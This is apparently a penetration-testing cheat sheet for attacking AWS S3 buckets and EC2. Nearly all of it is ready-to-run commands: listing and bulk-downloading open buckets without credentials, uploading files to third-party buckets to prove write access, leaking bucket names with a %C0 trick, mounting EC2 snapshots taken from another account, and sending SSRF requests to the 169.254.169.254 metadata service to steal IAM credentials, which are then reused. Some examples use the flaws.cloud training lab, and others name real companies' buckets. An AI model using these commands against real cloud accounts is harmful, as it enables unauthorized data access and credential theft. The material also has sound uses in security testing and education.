# Amazon Bucket S3 AWS
## Summary
- [AWS Configuration](#aws-configuration)
- [Open Bucket](#open-bucket)
- [Basic tests](#basic-tests)
- [Listing files](#listing-files)
- [Move a file into the bucket](#move-a-file-into-the-bucket)
- [Download everything](#download-everything)
- [Check bucket disk size](#check-bucket-disk-size)
- [AWS - Extract Backup](#aws---extract-backup)
- [Bucket juicy data](#bucket-juicy-data)
## AWS Configuration
Prerequisite: at a minimum you need `awscli` installed.
```bash
sudo apt install awscli
```
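If the distribution package is old or unavailable, `awscli` can also be installed through pip (shown here as an alternative sketch, not part of the original guide):

```bash
# install the AWS CLI via pip for the current user
python3 -m pip install --user awscli
aws --version
```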
You can get your credentials from https://console.aws.amazon.com/iam/home?#/security_credential, but you need an AWS account. A free tier account is available at https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/.
```bash
aws configure
AWS Access Key ID [None]: [ENTER HERE YOUR KEY ID]
AWS Secret Access Key [None]: [ENTER HERE YOUR SECRET KEY]
```
```bash
aws configure --profile nameofprofile
```
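The keys for each profile end up in `~/.aws/credentials`; a rough sketch of what that file looks like (values redacted):

```bash
$ cat ~/.aws/credentials
[nameofprofile]
aws_access_key_id = AKIA...REDACTED
aws_secret_access_key = REDACTED
```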
Then add `--profile nameofprofile` to your aws commands. Alternatively you can use environment variables instead of creating a profile:
```bash
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
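Whichever way the credentials are supplied, you can verify that they are valid and see which identity they map to with `sts get-caller-identity`:

```bash
# confirm the credentials work and display the account ID / ARN they belong to
aws sts get-caller-identity
aws sts get-caller-identity --profile nameofprofile
```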
## Open Bucket
By default, Amazon S3 bucket URLs look like http://s3.amazonaws.com/[bucket_name]/; you can browse open buckets if you know their names.
```bash
http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/
http://flaws.cloud.s3.amazonaws.com/
https://buckets.grayhatwarfare.com/
```
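A quick unauthenticated check is to request the bucket URL directly: an open bucket answers with a `ListBucketResult` XML document, while a locked-down one returns an `AccessDenied` error (sketch, the first bucket name is a placeholder):

```bash
# an open bucket returns <ListBucketResult>...</ListBucketResult>
curl http://[bucket_name].s3.amazonaws.com/
curl http://flaws.cloud.s3.amazonaws.com/
```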
The bucket name is also disclosed in the XML output when listing is enabled:
```xml
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>adobe-REDACTED-REDACTED-REDACTED</Name>
```
Alternatively, you can leak the name of the S3 bucket backing a site by appending `%C0` to a resource URL (trick from https://twitter.com/0xmdv/status/1065581916437585920):
```bash
# append %C0 to an existing resource URL, e.g.
http://example.com/resources/id%C0
http://redacted/avatar/123%C0
```
## Basic tests
### Listing files
```bash
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
```
You can find the bucket's region with `dig` and `nslookup`:
```bash
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11
$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
```
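Another option (not in the original write-up) is to read the `x-amz-bucket-region` header that S3 returns on a plain HTTP request to the bucket:

```bash
# S3 discloses the bucket region in the x-amz-bucket-region response header
curl -sI https://flaws.cloud.s3.amazonaws.com/ | grep -i x-amz-bucket-region
```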
### Move a file into the bucket
```bash
aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```
```bash
aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
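If the upload succeeds you have proven write access; you can then remove the proof-of-concept file (assuming the credentials you used are still allowed to delete the object):

```bash
# clean up the test file after a successful write check
aws s3 rm s3://hackerone.files/test.txt
```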
### Download everything
```powershell
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
```
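Once the bucket content is mirrored locally, a quick grep for credentials or other sensitive strings is usually worthwhile (illustrative patterns only):

```bash
# hunt for secrets in the downloaded files
grep -rniE "aws_secret_access_key|password|BEGIN RSA PRIVATE KEY" .
```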
### Check bucket disk size
Use `--no-sign-request` for an unauthenticated check.
```powershell
aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
```
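The CLI can also compute the total itself with `--summarize` (same idea, without the awk post-processing):

```bash
# prints the total object count and total size at the end of the listing
aws s3 ls s3://<bucketname> --recursive --human-readable --summarize --no-sign-request
```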
## AWS - Extract Backup
```powershell
# identify the account id
$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",

# list the available snapshots
$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",

# create a volume using the snapshot
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89

# in the AWS Console -> EC2, launch a new Ubuntu instance, attach the volume to it, then connect
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com

# mount the volume and browse its content
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt
```
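The attach step can also be done from the CLI instead of the console (volume and instance IDs below are placeholders):

```bash
# attach the volume created from the snapshot to your EC2 instance
aws --profile swk ec2 attach-volume --region us-west-2 --device /dev/sdf --volume-id vol-XXXXXXXXXXXX --instance-id i-XXXXXXXXXXXX
```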
## Bucket juicy data
Amazon exposes an internal metadata service that every EC2 instance can query for information about its host. If you find an SSRF vulnerability in an application running on EC2, try requesting:
```powershell
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
# returns the AccessKeyId, SecretAccessKey and Token for the role
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
```
For example, through a proxy: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
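The credentials returned by the metadata service are temporary, so the session token must be supplied as well; a minimal sketch of reusing them with the CLI (values redacted):

```bash
# plug the stolen AccessKeyId / SecretAccessKey / Token into the CLI
export AWS_ACCESS_KEY_ID=ASIA...REDACTED
export AWS_SECRET_ACCESS_KEY=REDACTED
export AWS_SESSION_TOKEN=REDACTED
aws sts get-caller-identity
aws s3 ls
```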
## References
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)